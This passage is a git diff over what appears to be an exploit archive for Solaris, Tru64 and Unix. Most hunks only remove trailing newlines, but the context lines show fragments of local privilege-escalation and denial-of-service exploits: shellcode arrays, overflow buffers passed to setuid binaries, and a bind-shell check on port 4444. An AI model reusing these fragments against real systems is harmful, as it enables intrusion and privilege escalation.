-166,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/solaris_x86/shellcode/13704.c b/platforms/solaris_x86/shellcode/13704.c index 19c78913d..34dca3989 100755 --- a/platforms/solaris_x86/shellcode/13704.c +++ b/platforms/solaris_x86/shellcode/13704.c @@ -40,5 +40,4 @@ int main(void) (*(void(*)()) sc)(); return 0; -} - +} \ No newline at end of file diff --git a/platforms/solaris_x86/shellcode/13707.c b/platforms/solaris_x86/shellcode/13707.c index 147bcce31..e0d5e0ddc 100755 --- a/platforms/solaris_x86/shellcode/13707.c +++ b/platforms/solaris_x86/shellcode/13707.c @@ -62,4 +62,4 @@ int main(void) (*(void(*)()) sc)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/solaris_x86/shellcode/13709.c b/platforms/solaris_x86/shellcode/13709.c index 1b625b057..5797076e8 100755 --- a/platforms/solaris_x86/shellcode/13709.c +++ b/platforms/solaris_x86/shellcode/13709.c @@ -56,4 +56,4 @@ int main(void) (*(void(*)()) sc)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/solaris_x86/shellcode/13711.c b/platforms/solaris_x86/shellcode/13711.c index 1ebe83bd9..0661fd968 100755 --- a/platforms/solaris_x86/shellcode/13711.c +++ b/platforms/solaris_x86/shellcode/13711.c @@ -85,4 +85,4 @@ int main(void) (*(void(*)()) sc)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/solaris_x86/shellcode/13875.c b/platforms/solaris_x86/shellcode/13875.c index 87a66b0e3..b1c2b0998 100755 --- a/platforms/solaris_x86/shellcode/13875.c +++ b/platforms/solaris_x86/shellcode/13875.c @@ -50,4 +50,4 @@ int main(void) (*(void(*)()) sc)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/system_z/shellcode/38075.txt b/platforms/system_z/shellcode/38075.txt index f492e40ee..352387ae0 100755 --- a/platforms/system_z/shellcode/38075.txt +++ b/platforms/system_z/shellcode/38075.txt @@ -327,4 +327,4 @@ char sc[]= "\x49\xad\xf4\xf6\xf2\xf3\xf5\x7d\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51" "\x52\xb9\xfb\xfc\xf9\xfa\xff\x5c\xf7\x53\x54\x55\x56\x57\x58\x59" "\x5a\xb2\xd4\xd6\xd2\xd3\xd5\x30\x31\x32\x33\x34\x35\x36\x37\x38" -"\x39\xb3\xdb\xdc\xd9\xda\x9f\xf0"; +"\x39\xb3\xdb\xdc\xd9\xda\x9f\xf0"; \ No newline at end of file diff --git a/platforms/tru64/local/1624.pl b/platforms/tru64/local/1624.pl index 0c807c6e4..a8fe2336a 100755 --- a/platforms/tru64/local/1624.pl +++ b/platforms/tru64/local/1624.pl @@ -27,4 +27,4 @@ $ret = "\x9a\x01\x01\x40\x01"; $ENV{"NLSPATH"}= pack("l",0x47ff041f) x ($tlen) . $sc . $ret; exec("/usr/bin/rdist -c DMr0x"); -# milw0rm.com [2006-03-29] +# milw0rm.com [2006-03-29] \ No newline at end of file diff --git a/platforms/tru64/local/1625.pl b/platforms/tru64/local/1625.pl index ddef6455c..3e92ce694 100755 --- a/platforms/tru64/local/1625.pl +++ b/platforms/tru64/local/1625.pl @@ -29,4 +29,4 @@ $ENV{"NLSPATH"}= pack("l",0x47ff041f) x ($tlen) . $sc . $ret; $heapgrow = "B" x 10000 . " " . "C" x 10000 . "D" x 10000; exec("/usr/tcb/bin/edauth -df DMr0x.$heapgrow"); -# milw0rm.com [2006-03-29] +# milw0rm.com [2006-03-29] \ No newline at end of file diff --git a/platforms/tru64/local/259.c b/platforms/tru64/local/259.c index 71b68b503..0ca5cef1c 100755 --- a/platforms/tru64/local/259.c +++ b/platforms/tru64/local/259.c @@ -90,4 +90,4 @@ int main(int argc, char **argv) } -// milw0rm.com [2001-01-26] +// milw0rm.com [2001-01-26] \ No newline at end of file diff --git a/platforms/tru64/local/281.c b/platforms/tru64/local/281.c index 96f86150d..4b15f2f73 100755 --- a/platforms/tru64/local/281.c +++ b/platforms/tru64/local/281.c @@ -81,4 +81,4 @@ address = i& - offset; } -// milw0rm.com [2001-03-02] +// milw0rm.com [2001-03-02] \ No newline at end of file diff --git a/platforms/tru64/local/3273.ksh b/platforms/tru64/local/3273.ksh index ff4cc5ac8..380bb2107 100755 --- a/platforms/tru64/local/3273.ksh +++ b/platforms/tru64/local/3273.ksh @@ -43,4 +43,4 @@ ps auxewww echo "/usr/ucb/ps executable: " /usr/ucb/ps auxewww -# milw0rm.com [2007-02-06] +# milw0rm.com [2007-02-06] \ No newline at end of file diff --git a/platforms/tru64/remote/4032.pl b/platforms/tru64/remote/4032.pl index c62322215..c8ac9744a 100755 --- a/platforms/tru64/remote/4032.pl +++ b/platforms/tru64/remote/4032.pl @@ -95,4 +95,4 @@ foreach my $key (sort {$htimes{$b}<=>$htimes{$a}} keys %htimes) { } exit(0); -# milw0rm.com [2007-06-04] +# milw0rm.com [2007-06-04] \ No newline at end of file diff --git a/platforms/ultrix/local/698.c b/platforms/ultrix/local/698.c index c3652c29e..4222d53bc 100755 --- a/platforms/ultrix/local/698.c +++ b/platforms/ultrix/local/698.c @@ -61,4 +61,4 @@ int main(void) execl ("/usr/bin/dxterm", "dxterm", "-display", "localhost:0", "-setup", buf, NULL); } -// milw0rm.com [2004-12-20] +// milw0rm.com [2004-12-20] \ No newline at end of file diff --git a/platforms/unix/dos/16284.rb b/platforms/unix/dos/16284.rb index a1f822324..dd08d38e4 100755 --- a/platforms/unix/dos/16284.rb +++ b/platforms/unix/dos/16284.rb @@ -131,4 +131,4 @@ class Metasploit3 < Msf::Exploit::Remote "#{buf.length}:" + buf end -end +end \ No newline at end of file diff --git a/platforms/unix/dos/19615.c b/platforms/unix/dos/19615.c index a38ff0ddd..383e2d898 100755 --- a/platforms/unix/dos/19615.c +++ b/platforms/unix/dos/19615.c @@ -550,4 +550,4 @@ int main(int argc, char **argv) } while (archlist[arch].safe>1); /* infinite loop for sparc */ proxyloop(s2); exit(1); -} +} \ No newline at end of file diff --git a/platforms/unix/dos/21074.pl b/platforms/unix/dos/21074.pl index adb690746..61be90cdc 100755 --- a/platforms/unix/dos/21074.pl +++ b/platforms/unix/dos/21074.pl @@ -39,5 +39,4 @@ print $remote "LIST $err/\n" and print "3. Sending : ErrorCode...\n\n"or die print "Attack done. press any key to exit\nnote: Attack done doesn't mean Attack successful\n"; $bla= <STDIN>; -close $remote; - +close $remote; \ No newline at end of file diff --git a/platforms/unix/dos/21409.pl b/platforms/unix/dos/21409.pl index 5adf9b8c7..0f7be9fa9 100755 --- a/platforms/unix/dos/21409.pl +++ b/platforms/unix/dos/21409.pl @@ -82,4 +82,4 @@ die "BYE\n"; #By DVDMAN (DVDMAN@L33TSECURITY.COM) #WWW.L33TSECURITY.COM -#L33T SECURITY +#L33T SECURITY \ No newline at end of file diff --git a/platforms/unix/dos/21984.c b/platforms/unix/dos/21984.c index e7645f908..68075906d 100755 --- a/platforms/unix/dos/21984.c +++ b/platforms/unix/dos/21984.c @@ -63,4 +63,4 @@ int main(int argc, char *argv[]) while (getc(stdin) != '#'); return 0; -} +} \ No newline at end of file diff --git a/platforms/unix/dos/22286.html b/platforms/unix/dos/22286.html index 13a9eb875..d9d9862f4 100755 --- a/platforms/unix/dos/22286.html +++ b/platforms/unix/dos/22286.html @@ -7,5 +7,4 @@ If a malicious page is viewed the browser reportedly becomes unstable. One possi <html> <body> <div style="position:absolute;"> <div style="position:absolute; overflow:scroll"> </div> </div> -</body> </html> - +</body> </html> \ No newline at end of file diff --git a/platforms/unix/dos/30714.pl b/platforms/unix/dos/30714.pl index af9f378da..051adc86d 100755 --- a/platforms/unix/dos/30714.pl +++ b/platforms/unix/dos/30714.pl @@ -23,5 +23,4 @@ $sock->send( "a003 LSUB arg1 arg2\r\n" ); sleep( 3 ); close( $sock ); -print "[+] Done. Now check for a bind shell on $ip:4444!\n"; - +print "[+] Done. Now check for a bind shell on $ip:4444!\n"; \ No newline at end of file diff --git a/platforms/unix/dos/31627.c b/platforms/unix/dos/31627.c index 373a8de4f..5a3c5e856 100755 --- a/platforms/unix/dos/31627.c +++ b/platforms/unix/dos/31627.c @@ -45,5 +45,4 @@ int main(int argc, char *argv[]) printf("done!"); -} - +} \ No newline at end of file diff --git a/platforms/unix/dos/41142.c b/platforms/unix/dos/41142.c index 3b5242893..c7623698b 100755 --- a/platforms/unix/dos/41142.c +++ b/platforms/unix/dos/41142.c @@ -93,4 +93,4 @@ addr_in)) =3D=3D -1){ exit(-1); } } -} +} \ No newline at end of file diff --git a/platforms/unix/local/10044.pl b/platforms/unix/local/10044.pl index d9ac3ca63..5adfd6f8b 100755 --- a/platforms/unix/local/10044.pl +++ b/platforms/unix/local/10044.pl @@ -68,4 +68,4 @@ send SOCK, $buf,0; close SOCK; -print "\n [+] Attack String sent. Try to connect to Port 19091\n\n"; +print "\n [+] Attack String sent. Try to connect to Port 19091\n\n"; \ No newline at end of file diff --git a/platforms/unix/local/19172.c b/platforms/unix/local/19172.c index 978da0465..99b6709b9 100755 --- a/platforms/unix/local/19172.c +++ b/platforms/unix/local/19172.c @@ -60,5 +60,4 @@ need...\n"); ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL); -} - +} \ No newline at end of file diff --git a/platforms/unix/local/19173.c b/platforms/unix/local/19173.c index 188e890b4..d9fd7d4ee 100755 --- a/platforms/unix/local/19173.c +++ b/platforms/unix/local/19173.c @@ -93,4 +93,4 @@ ffff); execve("/usr/bin/X11/xlock",args,newenv); perror("Error executing execve \n"); - } + } \ No newline at end of file diff --git a/platforms/unix/local/19200.c b/platforms/unix/local/19200.c index 32b06d4b4..13d80e00e 100755 --- a/platforms/unix/local/19200.c +++ b/platforms/unix/local/19200.c @@ -80,7 +80,4 @@ The libXt library is part of the X Windows system. There are several buffer over case 6: execl("/usr/bin/X11/xconsole","lsd","-xrm",buffer,0); case 7: execl("/usr/bin/X11/xterm","lsd","-xrm",buffer,0); } - } - - - + } \ No newline at end of file diff --git a/platforms/unix/local/19201.c b/platforms/unix/local/19201.c index a7855e953..1ed4d1b74 100755 --- a/platforms/unix/local/19201.c +++ b/platforms/unix/local/19201.c @@ -64,4 +64,4 @@ main(int argc, char *argv[]) printf("buffer size = %d\n", strlen(buffer)); execl("/usr/dt/bin/dtterm", "dtterm", "-xrm", buffer, NULL); printf("exec failed\n"); -} +} \ No newline at end of file diff --git a/platforms/unix/local/19202.c b/platforms/unix/local/19202.c index acece1ed1..6986e4866 100755 --- a/platforms/unix/local/19202.c +++ b/platforms/unix/local/19202.c @@ -124,4 +124,4 @@ main(int argc, char *argv[]) printf("buffer size = %d\n", strlen(buffer)); execl("/usr/X/bin/xterm", "xterm", "-xrm", buffer, NULL); printf("exec failed\n"); -} +} \ No newline at end of file diff --git a/platforms/unix/local/19203.c b/platforms/unix/local/19203.c index e4828c09f..a1bc84ccb 100755 --- a/platforms/unix/local/19203.c +++ b/platforms/unix/local/19203.c @@ -56,4 +56,4 @@ The vulnerability was updated august 2, 2000 to reflect certain versions of IRIX *b=0; execle("/usr/bsd/rlogin","rlogin","localhost",0,envp); - } + } \ No newline at end of file diff --git a/platforms/unix/local/19582.c b/platforms/unix/local/19582.c index 3d9dec6af..9c1860d6a 100755 --- a/platforms/unix/local/19582.c +++ b/platforms/unix/local/19582.c @@ -65,4 +65,4 @@ main() strncpy(xx+EXP_ADR,exec,strlen(exec)); xx[MAXBUF]=0; execl("/usr/bin/uum","uum","-D",xx,(char *) 0); -} +} \ No newline at end of file diff --git a/platforms/unix/local/19583.c b/platforms/unix/local/19583.c index 85b1f2e89..eac05fb5e 100755 --- a/platforms/unix/local/19583.c +++ b/platforms/unix/local/19583.c @@ -69,4 +69,4 @@ main() buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; execl("/usr/jp/canna/bin/canuum","canuum","-k",buf,(char *)0); -} +} \ No newline at end of file diff --git a/platforms/unix/local/19590.c b/platforms/unix/local/19590.c index b6aaaaac3..75d826953 100755 --- a/platforms/unix/local/19590.c +++ b/platforms/unix/local/19590.c @@ -61,4 +61,4 @@ main (int argc, char *argv[] ) { execl("/usr/local/bin/faxalter", "faxalter", "-m", buf, NULL); -} +} \ No newline at end of file diff --git a/platforms/unix/local/19971.c b/platforms/unix/local/19971.c index ba6a98ee9..2ed88206b 100755 --- a/platforms/unix/local/19971.c +++ b/platforms/unix/local/19971.c @@ -83,4 +83,4 @@ install. } exit(0); } - + \ No newline at end of file diff --git a/platforms/unix/local/19972.c b/platforms/unix/local/19972.c index a900c0118..bddf63f8b 100755 --- a/platforms/unix/local/19972.c +++ b/platforms/unix/local/19972.c @@ -39,4 +39,4 @@ int main(int argc,char *argv[]){ setenv("SHELL",buff,1); if((execl(PATH,"elm",0)) < 0) fprintf(stderr,"Kurwa Mac! No %s file ?\n",PATH); return 0; -} +} \ No newline at end of file diff --git a/platforms/unix/local/20042.c b/platforms/unix/local/20042.c index 0f7beb38b..0f19622bc 100755 --- a/platforms/unix/local/20042.c +++ b/platforms/unix/local/20042.c @@ -38,6 +38,4 @@ main (int argc, char **argv) printf("\n\"+\" could also be a space [ ]\n"); -} - - +} \ No newline at end of file diff --git a/platforms/unix/local/20056.c b/platforms/unix/local/20056.c index 4573e9c8a..dee6d4073 100755 --- a/platforms/unix/local/20056.c +++ b/platforms/unix/local/20056.c @@ -104,4 +104,4 @@ if (fd < 0) dumpfile(fd); } exit(0); -} +} \ No newline at end of file diff --git a/platforms/unix/local/20058.pl b/platforms/unix/local/20058.pl index 932d2ec14..c16fa61e2 100755 --- a/platforms/unix/local/20058.pl +++ b/platforms/unix/local/20058.pl @@ -179,4 +179,4 @@ sub decrypt { } return $passwd; -} +} \ No newline at end of file diff --git a/platforms/unix/local/20153.c b/platforms/unix/local/20153.c index 9258c6306..e7f1cc57b 100755 --- a/platforms/unix/local/20153.c +++ b/platforms/unix/local/20153.c @@ -106,5 +106,4 @@ if (shell_addr[1] > shell_addr[0]) { execve("/usr/X11R6/bin/xlock", args, envs); perror("execve"); -} - +} \ No newline at end of file diff --git a/platforms/unix/local/20189.c b/platforms/unix/local/20189.c index 6a4865051..b1882a8d1 100755 --- a/platforms/unix/local/20189.c +++ b/platforms/unix/local/20189.c @@ -498,4 +498,4 @@ char *xrealloc(void *ptr, size_t size) /* * [root@satan scrippie]# whatis life * life: nothing appropriate - */ + */ \ No newline at end of file diff --git a/platforms/unix/local/20190.c b/platforms/unix/local/20190.c index 1bd1f35ad..00d831f5e 100755 --- a/platforms/unix/local/20190.c +++ b/platforms/unix/local/20190.c @@ -136,4 +136,4 @@ main(int argc,char *argv[],char *env[]) execl("/usr/sbin/userhelper","/usr/sbin/userhelper","-t","-w","/sbin/kbdrate",0); } -/* end of zen-nktb.c */ +/* end of zen-nktb.c */ \ No newline at end of file diff --git a/platforms/unix/local/20326.sh b/platforms/unix/local/20326.sh index 45ef4a469..6bebcf6d9 100755 --- a/platforms/unix/local/20326.sh +++ b/platforms/unix/local/20326.sh @@ -232,4 +232,4 @@ brute "$padding$gstring" ${nwrt} ${nnops} echo "" echo "[+] done" -echo "" +echo "" \ No newline at end of file diff --git a/platforms/unix/local/20380.c b/platforms/unix/local/20380.c index 3b8f7a95e..48d11c989 100755 --- a/platforms/unix/local/20380.c +++ b/platforms/unix/local/20380.c @@ -189,4 +189,4 @@ int main(int argc, char *argv[]) break; } printf("Finished.\n"); -} +} \ No newline at end of file diff --git a/platforms/unix/local/20381.c b/platforms/unix/local/20381.c index a4951afbe..8d9d03841 100755 --- a/platforms/unix/local/20381.c +++ b/platforms/unix/local/20381.c @@ -193,4 +193,4 @@ int main(int argc, char *argv[]) break; } printf("Finished.\n"); -} +} \ No newline at end of file diff --git a/platforms/unix/local/20410.cpp b/platforms/unix/local/20410.cpp index 78d1b6467..0a5fb7442 100755 --- a/platforms/unix/local/20410.cpp +++ b/platforms/unix/local/20410.cpp @@ -135,4 +135,4 @@ char *addytostr(unsigned char *blaat) ret[sizeof(unsigned char *)] = 0x00; return(ret); -} +} \ No newline at end of file diff --git a/platforms/unix/local/20526.c b/platforms/unix/local/20526.c index 6b3e1d193..557a24a35 100755 --- a/platforms/unix/local/20526.c +++ b/platforms/unix/local/20526.c @@ -100,5 +100,4 @@ int main(int argc,char **argv){ unlink(MODEXEC); exit(-1); } -} - +} \ No newline at end of file diff --git a/platforms/unix/local/20560.c b/platforms/unix/local/20560.c index dce61394b..88192d8f9 100755 --- a/platforms/unix/local/20560.c +++ b/platforms/unix/local/20560.c @@ -35,4 +35,4 @@ main (int argc, char **argv) netname, ntohl(block.key.high), ntohl(block.key.low)); -} +} \ No newline at end of file diff --git a/platforms/unix/local/20678.c b/platforms/unix/local/20678.c index b58d62bfe..d9df92ce0 100755 --- a/platforms/unix/local/20678.c +++ b/platforms/unix/local/20678.c @@ -37,4 +37,4 @@ main(int argc, char *argv[]) { buff[bsize - 1] = '\0'; execlp("/usr/X11R6/bin/ascdc","ascdc","-d",buff,0); -} +} \ No newline at end of file diff --git a/platforms/unix/local/20679.c b/platforms/unix/local/20679.c index f5e4ee77b..978d6086d 100755 --- a/platforms/unix/local/20679.c +++ b/platforms/unix/local/20679.c @@ -107,4 +107,4 @@ int main(int argc, char *argv[]) return 0; } -/* remember, there's no cure for BsE */ +/* remember, there's no cure for BsE */ \ No newline at end of file diff --git a/platforms/unix/local/20697.c b/platforms/unix/local/20697.c index 686ff433d..f9745b011 100755 --- a/platforms/unix/local/20697.c +++ b/platforms/unix/local/20697.c @@ -95,4 +95,4 @@ int main(int argc, char *argv[]) { if (getenv("EGG")) dosquash(argc, (unsigned char **)argv); else prepare2(argc, argv); return 1; -} +} \ No newline at end of file diff --git a/platforms/unix/local/20766.c b/platforms/unix/local/20766.c index c43a1b59c..ba75ab847 100755 --- a/platforms/unix/local/20766.c +++ b/platforms/unix/local/20766.c @@ -92,5 +92,4 @@ main(int argc,char **argv){ *b=0; execle("/usr/dt/bin/dtsession","lsd",0,envp); -} - +} \ No newline at end of file diff --git a/platforms/unix/local/20906.c b/platforms/unix/local/20906.c index 836a13e11..cf8b8bac2 100755 --- a/platforms/unix/local/20906.c +++ b/platforms/unix/local/20906.c @@ -112,4 +112,4 @@ void main(int argc, char **argv) { printf("Could not start su-wrapper, /usr/sbin/su-wrapper exists?\n"); } -} +} \ No newline at end of file diff --git a/platforms/unix/local/20923.c b/platforms/unix/local/20923.c index 38da5ac61..aa20ff6fd 100755 --- a/platforms/unix/local/20923.c +++ b/platforms/unix/local/20923.c @@ -93,4 +93,4 @@ main() } } } -} +} \ No newline at end of file diff --git a/platforms/unix/local/20960.c b/platforms/unix/local/20960.c index 99760ad9c..f5ddff140 100755 --- a/platforms/unix/local/20960.c +++ b/platforms/unix/local/20960.c @@ -53,6 +53,4 @@ pointers*/ execl ("/usr/sbin/ntping", "ntping", buffer,0, 0); -} - - +} \ No newline at end of file diff --git a/platforms/unix/local/20961.sh b/platforms/unix/local/20961.sh index 9d86925d7..a1a04e28e 100755 --- a/platforms/unix/local/20961.sh +++ b/platforms/unix/local/20961.sh @@ -97,4 +97,4 @@ echo "" echo "starting ./sush" ./sush -#!plonk +#!plonk \ No newline at end of file diff --git a/platforms/unix/local/20962.pl b/platforms/unix/local/20962.pl index 889fe9d7d..46bd4ca08 100755 --- a/platforms/unix/local/20962.pl +++ b/platforms/unix/local/20962.pl @@ -162,4 +162,4 @@ sub connect_host { socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); return(1); -} +} \ No newline at end of file diff --git a/platforms/unix/local/20963.c b/platforms/unix/local/20963.c index 6acf12941..57d09af72 100755 --- a/platforms/unix/local/20963.c +++ b/platforms/unix/local/20963.c @@ -92,4 +92,4 @@ main(int argc,char*argv[]) fprintf(f,"Visit http://mp3.com/cosv/ today!\n"); fclose(f); -} +} \ No newline at end of file diff --git a/platforms/unix/local/20964.c b/platforms/unix/local/20964.c index b6bad3e07..593b61fe0 100755 --- a/platforms/unix/local/20964.c +++ b/platforms/unix/local/20964.c @@ -231,4 +231,4 @@ usage(char *progname) } exit(1); -} +} \ No newline at end of file diff --git a/platforms/unix/local/21045.c b/platforms/unix/local/21045.c index dc1519851..349a348ee 100755 --- a/platforms/unix/local/21045.c +++ b/platforms/unix/local/21045.c @@ -69,5 +69,4 @@ ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); setenv("ORACLE_HOME",ORACLE_HOME,1); setenv("EGG",buff,1); system(BINARY); -} - +} \ No newline at end of file diff --git a/platforms/unix/local/21105.c b/platforms/unix/local/21105.c index 25ed3bbeb..ce74ef648 100755 --- a/platforms/unix/local/21105.c +++ b/platforms/unix/local/21105.c @@ -101,4 +101,4 @@ i++ ) strcat ( buf_ptr , retaddr ); execl ("/var/tmp/mh/msgchk", "msgchk", buf, NULL ); -} +} \ No newline at end of file diff --git a/platforms/unix/local/21107.sh b/platforms/unix/local/21107.sh index 805ac67d1..ca3298d0b 100755 --- a/platforms/unix/local/21107.sh +++ b/platforms/unix/local/21107.sh @@ -16,4 +16,4 @@ fi cd ~ ln -sf $1 ~/.mh_profile -/usr/bin/mh/msgchk +/usr/bin/mh/msgchk \ No newline at end of file diff --git a/platforms/unix/local/21120.c b/platforms/unix/local/21120.c index 80ac65e35..48cdfda70 100755 --- a/platforms/unix/local/21120.c +++ b/platforms/unix/local/21120.c @@ -55,4 +55,4 @@ main(int argc, char **argv) printf("jmp to [0x%08x]\n",writeaddr); execve(arg[0], arg, 0); -} +} \ No newline at end of file diff --git a/platforms/unix/local/21150.c b/platforms/unix/local/21150.c index 7a6d2565b..918f5e1ab 100755 --- a/platforms/unix/local/21150.c +++ b/platforms/unix/local/21150.c @@ -167,4 +167,4 @@ int main(int argc, char** argv) } } -/*..Thanks for all xfocus members.. especially virtualcat*/ +/*..Thanks for all xfocus members.. especially virtualcat*/ \ No newline at end of file diff --git a/platforms/unix/local/21414.c b/platforms/unix/local/21414.c index 747263634..83d97ffa2 100755 --- a/platforms/unix/local/21414.c +++ b/platforms/unix/local/21414.c @@ -223,5 +223,4 @@ stuff(int que) return; } } -} - +} \ No newline at end of file diff --git a/platforms/unix/local/21516.pl b/platforms/unix/local/21516.pl index 1fa621018..dfe6d8774 100755 --- a/platforms/unix/local/21516.pl +++ b/platforms/unix/local/21516.pl @@ -96,4 +96,4 @@ sw_fmtstr_create ($$$) sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn", $dest_addr1, $dest_addr2, $high, $dist, $low, $dist + 1); -} +} \ No newline at end of file diff --git a/platforms/unix/local/21565.pl b/platforms/unix/local/21565.pl index e810a8d07..d7449fe9c 100755 --- a/platforms/unix/local/21565.pl +++ b/platforms/unix/local/21565.pl @@ -33,5 +33,4 @@ $buf .= "A"; $ENV{"INTERBASE"} = $buf; -exec("/usr/local/interbase/bin/gds_drop"); - +exec("/usr/local/interbase/bin/gds_drop"); \ No newline at end of file diff --git a/platforms/unix/local/21566.c b/platforms/unix/local/21566.c index 1211892e2..53b7eb9fa 100755 --- a/platforms/unix/local/21566.c +++ b/platforms/unix/local/21566.c @@ -164,4 +164,4 @@ if(selectcode == (char *)&dropcode) return 0; -} +} \ No newline at end of file diff --git a/platforms/unix/local/21592.c b/platforms/unix/local/21592.c index 4eef387c2..290905c45 100755 --- a/platforms/unix/local/21592.c +++ b/platforms/unix/local/21592.c @@ -871,7 +871,4 @@ register unsigned long *block, *keys; return; - } - - - + } \ No newline at end of file diff --git a/platforms/unix/local/21760.c b/platforms/unix/local/21760.c index d1eda2615..7350de2f1 100755 --- a/platforms/unix/local/21760.c +++ b/platforms/unix/local/21760.c @@ -60,7 +60,4 @@ int main(int argc, char **argv) execl("gdam123", "gdam123_hacked",buffer, NULL); return(0); -} - - - +} \ No newline at end of file diff --git a/platforms/unix/local/21771.c b/platforms/unix/local/21771.c index b2ecdc5c3..b1530d145 100755 --- a/platforms/unix/local/21771.c +++ b/platforms/unix/local/21771.c @@ -60,5 +60,4 @@ A number of the vulnerable AFD binaries are installed setuid root and may potent execl("/bin/mon_ctrl", "mon_ctrl", NULL); return 0; - } - + } \ No newline at end of file diff --git a/platforms/unix/local/21772.pl b/platforms/unix/local/21772.pl index ccc7effe4..72b743cc4 100755 --- a/platforms/unix/local/21772.pl +++ b/platforms/unix/local/21772.pl @@ -105,5 +105,4 @@ if ($target eq 0) { } -exec("$b"); - +exec("$b"); \ No newline at end of file diff --git a/platforms/unix/local/21773.pl b/platforms/unix/local/21773.pl index 8c787dd25..f9300e76b 100755 --- a/platforms/unix/local/21773.pl +++ b/platforms/unix/local/21773.pl @@ -31,4 +31,4 @@ system("ulimit -c 10000"); # 0x14001019a Compaq Tru64 UNIX V5.0 (Rev. 910) (TruNastyWhore.localdomain) $ret = "\x9a\x01\x01\x40\x01"; $ENV{"NLSPATH"}= pack("l",0x47ff041f) x ($tlen) . $sc . $ret; -exec("/usr/bin/rdist -c DMr0x"); +exec("/usr/bin/rdist -c DMr0x"); \ No newline at end of file diff --git a/platforms/unix/local/21774.pl b/platforms/unix/local/21774.pl index 9c4c1f64c..0efacc247 100755 --- a/platforms/unix/local/21774.pl +++ b/platforms/unix/local/21774.pl @@ -62,5 +62,4 @@ $buf_b .= $sc; $ENV{"_XKB_CHARSET"} = $buf_a; $ENV{"HOME"} = $buf_b; -exec("$b"); - +exec("$b"); \ No newline at end of file diff --git a/platforms/unix/local/21805.c b/platforms/unix/local/21805.c index 59e955971..72711038c 100755 --- a/platforms/unix/local/21805.c +++ b/platforms/unix/local/21805.c @@ -102,5 +102,4 @@ int main(int argc, char **argv[]) execl(BIN,BIN,"-d",bof,0); // b00m! return(0); -} - +} \ No newline at end of file diff --git a/platforms/unix/local/21806.c b/platforms/unix/local/21806.c index 5a663745b..f59219887 100755 --- a/platforms/unix/local/21806.c +++ b/platforms/unix/local/21806.c @@ -77,6 +77,4 @@ if(execl(file,file,"-d",buffer,NULL) != 0) { return 0; -} - - +} \ No newline at end of file diff --git a/platforms/unix/local/21807.pl b/platforms/unix/local/21807.pl index 9969d8551..3d32ed851 100755 --- a/platforms/unix/local/21807.pl +++ b/platforms/unix/local/21807.pl @@ -30,6 +30,4 @@ $buf_a .= pack("l",0x47ff041f)x2048; $buf_a .= $sc; $buf_a .= $ret_addr; -exec("/usr/bin/X11/dxterm","-customization",$buf_a); - - +exec("/usr/bin/X11/dxterm","-customization",$buf_a); \ No newline at end of file diff --git a/platforms/unix/local/22324.c b/platforms/unix/local/22324.c index 4cd97b97f..4aeb98649 100755 --- a/platforms/unix/local/22324.c +++ b/platforms/unix/local/22324.c @@ -299,4 +299,4 @@ ptr -= 9; } free (buf); return; -} +} \ No newline at end of file diff --git a/platforms/unix/local/22325.c b/platforms/unix/local/22325.c index 36c89721b..289980358 100755 --- a/platforms/unix/local/22325.c +++ b/platforms/unix/local/22325.c @@ -166,4 +166,4 @@ prepare_code (unsigned char *os_code, unsigned char *filename, sprintf (complete + strlen (os_code), cmd, filename, shell, shell, shell, shell); return complete; -} +} \ No newline at end of file diff --git a/platforms/unix/local/22442.c b/platforms/unix/local/22442.c index 3a42a5917..742d2f1e7 100755 --- a/platforms/unix/local/22442.c +++ b/platforms/unix/local/22442.c @@ -350,4 +350,4 @@ int main(int argc, char *argv[]) { printf("Exploit failed... try adding -b\n"); exit(0); -} +} \ No newline at end of file diff --git a/platforms/unix/local/22924.c b/platforms/unix/local/22924.c index dc4ff5c19..fec324d4d 100755 --- a/platforms/unix/local/22924.c +++ b/platforms/unix/local/22924.c @@ -112,5 +112,4 @@ execve (args[0], args, env); perror ("execve"); return 0; -} - +} \ No newline at end of file diff --git a/platforms/unix/local/22939.pl b/platforms/unix/local/22939.pl index f47f37655..c61b0db68 100755 --- a/platforms/unix/local/22939.pl +++ b/platforms/unix/local/22939.pl @@ -24,4 +24,4 @@ print "\ndtors gnats exploit\n"; print "code by inv\n\n"; print ("Address: 0x", sprintf('%lx', $ret_hex),"\n\n"); -system('/usr/local/libexec/gnats/queue-pr -d $EXP -O bbb'); +system('/usr/local/libexec/gnats/queue-pr -d $EXP -O bbb'); \ No newline at end of file diff --git a/platforms/unix/local/22989.pl b/platforms/unix/local/22989.pl index 15cb64721..254ad7841 100755 --- a/platforms/unix/local/22989.pl +++ b/platforms/unix/local/22989.pl @@ -24,6 +24,4 @@ print FILEHANDLE "\tprintf(\"wicked done and dusted..\\n\")\n"; print FILEHANDLE "}"; close FILEHANDLE; system("gcc -fpic -shared -o libdl.so.2 foo.c"); -exec("db2dari") - - +exec("db2dari") \ No newline at end of file diff --git a/platforms/unix/local/23609.sh b/platforms/unix/local/23609.sh index bad2bab82..e411a0ac5 100755 --- a/platforms/unix/local/23609.sh +++ b/platforms/unix/local/23609.sh @@ -44,4 +44,4 @@ echo " This vulnerability was researched by Juan Manuel Pascual Escriba" echo " 08/08/2003 Barcelona - Spain pask@ 3s.com echo " " -echo " must wait until cron execute $CRONFILE and then exec su pakito" +echo " must wait until cron execute $CRONFILE and then exec su pakito" \ No newline at end of file diff --git a/platforms/unix/local/23610.c b/platforms/unix/local/23610.c index 6ab213a2b..42c571381 100755 --- a/platforms/unix/local/23610.c +++ b/platforms/unix/local/23610.c @@ -132,6 +132,4 @@ sc_address & ALG_MASK); -} - - +} \ No newline at end of file diff --git a/platforms/unix/local/24063.pl b/platforms/unix/local/24063.pl index 39f35705e..4a2300318 100755 --- a/platforms/unix/local/24063.pl +++ b/platforms/unix/local/24063.pl @@ -81,6 +81,4 @@ exec("/usr/openv/netbackup/bin/admincmd/bpauthorize -M $buf"); } if ($target eq 4) { 